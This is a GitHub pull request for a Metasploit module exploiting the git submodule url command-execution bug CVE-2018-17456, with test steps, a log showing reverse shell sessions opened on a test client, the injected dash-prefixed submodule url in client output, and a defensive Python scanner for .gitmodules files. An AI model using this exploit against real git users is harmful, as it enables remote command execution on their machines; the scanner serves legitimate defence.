
git submodule url exec (CVE-2018-17456) #10828

Merged
merged 6 commits into from Nov 14, 2018

4 participants
@timwr
Contributor

timwr commented Oct 18, 2018

This is an HTTP implementation of the recent git submodule command execution bug.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/git_submodule_url_exec
  • set LHOST <tab>
  • exploit
  • Clone the repository, e.g. git clone --recurse-submodules http://YOUR_IP/randomurl.git
  • Verify you get a shell.

Optional improvements (I probably won't have time for this)

  • Have the payload clean up the parent repository (and remove the vulnerability), so that it successfully clones.
  • Support clone via SSH
  • Support non-cmd payloads

@timwr timwr added the module label Oct 18, 2018

@bcoles bcoles added the needs-docs label Oct 18, 2018

timwr added some commits Oct 18, 2018

@bcoles


Contributor

bcoles commented Oct 18, 2018

I think GitHub's shiny new magic review tool means you can automatically commit changes directly from my review comments.

@bcoles bcoles added docs and removed needs-docs labels Oct 18, 2018

@timwr


Contributor

timwr commented Oct 18, 2018

Very cool. Thanks @bcoles!

@jrobles-r7 jrobles-r7 self-assigned this Nov 9, 2018

@jrobles-r7 jrobles-r7 merged commit 798d315 into rapid7:master Nov 14, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Nov 14, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 14, 2018

@jrobles-r7


Contributor

jrobles-r7 commented Nov 14, 2018

(compiled from source) git v2.17.1 on Debian 9.6

```
msf5 exploit(multi/http/git_submodule_url_exec) > 
[*] Started reverse TCP handler on 172.22.222.147:4444 
[*] Using URL: http://0.0.0.0:8080/4tJoOx
[*] Local IP: http://192.168.171.150:8080/4tJoOx
[*] Server started.
[*] Malicious Git URI is http://172.22.222.147:8080/jsep.git
[*] git clone --recurse-submodules http://172.22.222.147:8080/jsep.git
[*] Command shell session 1 opened (172.22.222.147:4444 -> 172.22.222.145:38980) at 2018-11-14 12:42:22 -0600
[*] Command shell session 2 opened (172.22.222.147:4444 -> 172.22.222.145:38982) at 2018-11-14 12:42:22 -0600
sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux db 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
whoami
msfdev
exit
[*] 172.22.222.145 - Command shell session 1 closed.
```

On client side

```
msfdev@db:~/bin$ ./git clone --recurse-submodules http://172.22.222.147:8080/jsep.git
Cloning into 'jsep'...
Submodule 'lrsxnt:nwzlf' (-u./sszi) registered for path 'lrsxnt:nwzlf'
Cloning into 'nwzlf'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./sszi' into submodule path '/home/msfdev/bin/jsep/lrsxnt:nwzlf' failed
Failed to clone 'lrsxnt:nwzlf'. Retry scheduled
Cloning into 'nwzlf'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./sszi' into submodule path '/home/msfdev/bin/jsep/lrsxnt:nwzlf' failed
Failed to clone 'lrsxnt:nwzlf' a second time, aborting
```

@jrobles-r7


Contributor

jrobles-r7 commented Nov 14, 2018

Release Notes

The exploits/multi/http/git_submodule_url_exec module has been added to the framework. This generates a response that causes vulnerable Git clients to execute an injected command when using the --recurse-submodules option while attempting to clone a repository (CVE-2018-17456).
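The release note describes the trigger for CVE-2018-17456: a submodule entry whose `url` starts with a dash, which the test output above shows as `-u./sszi`. On the defensive side, the same pattern is easy to spot in a repository's `.gitmodules` before any clone runs, which is useful for repository hosts, CI pipelines or code review where clients may not yet be on a fixed git release (fixed releases refuse dash-prefixed submodule urls and paths). The following scanner is an added example written for this page; it is not part of the Metasploit module or of git, and its sample `.gitmodules` content is constructed to mirror the entry seen in the client-side output.

```python
"""Flag .gitmodules entries whose url or path begins with a dash.

Added example, not code from the Metasploit module or the git project.
A dash-prefixed url is the CVE-2018-17456 pattern: the value is handed to
`git clone` as an argument, where an unpatched client treats it as an option.
"""
import re
from typing import Dict, List, Tuple

SECTION_RE = re.compile(r'^\[submodule\s+"([^"]*)"\]\s*$')
KEYVAL_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text: str) -> Dict[str, Dict[str, str]]:
    """Parse .gitmodules into {submodule_name: {key: value}}.

    Handles the subset git writes to that file: [submodule "name"] sections,
    key = value lines, and # / ; comment lines. Keys are lowercased as git does.
    """
    modules: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = modules.setdefault(m.group(1), {})
            continue
        m = KEYVAL_RE.match(line)
        if m and current is not None:
            value = m.group(2)
            # git permits quoted values; strip one layer of surrounding quotes
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]
            current[m.group(1).lower()] = value
    return modules


def find_dash_entries(text: str) -> List[Tuple[str, str, str]]:
    """Return (submodule_name, key, value) for each url or path starting with '-'.

    Both fields are checked because fixed git versions reject a leading dash
    in either one.
    """
    findings = []
    for name, cfg in parse_gitmodules(text).items():
        for key in ("url", "path"):
            value = cfg.get(key, "")
            if value.startswith("-"):
                findings.append((name, key, value))
    return findings


# Constructed sample: one ordinary submodule plus an entry shaped like the one
# in the client-side output above (url "-u./sszi", path "lrsxnt:nwzlf").
SAMPLE_GITMODULES = """\
[submodule "vendor/lib"]
\tpath = vendor/lib
\turl = https://example.invalid/vendor/lib.git
[submodule "lrsxnt:nwzlf"]
\tpath = lrsxnt:nwzlf
\turl = -u./sszi
"""

if __name__ == "__main__":
    for name, key, value in find_dash_entries(SAMPLE_GITMODULES):
        print(f"suspicious submodule {name!r}: {key} = {value!r}")
```

Run it against the `.gitmodules` of each commit pushed to a hosted repository (or as a pre-receive hook) and reject or quarantine any commit with a finding; the ordinary `vendor/lib` entry in the sample produces none, while the `-u./sszi` url is reported.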

@timwr timwr deleted the timwr:gitsubmodule_url_exec branch Nov 14, 2018
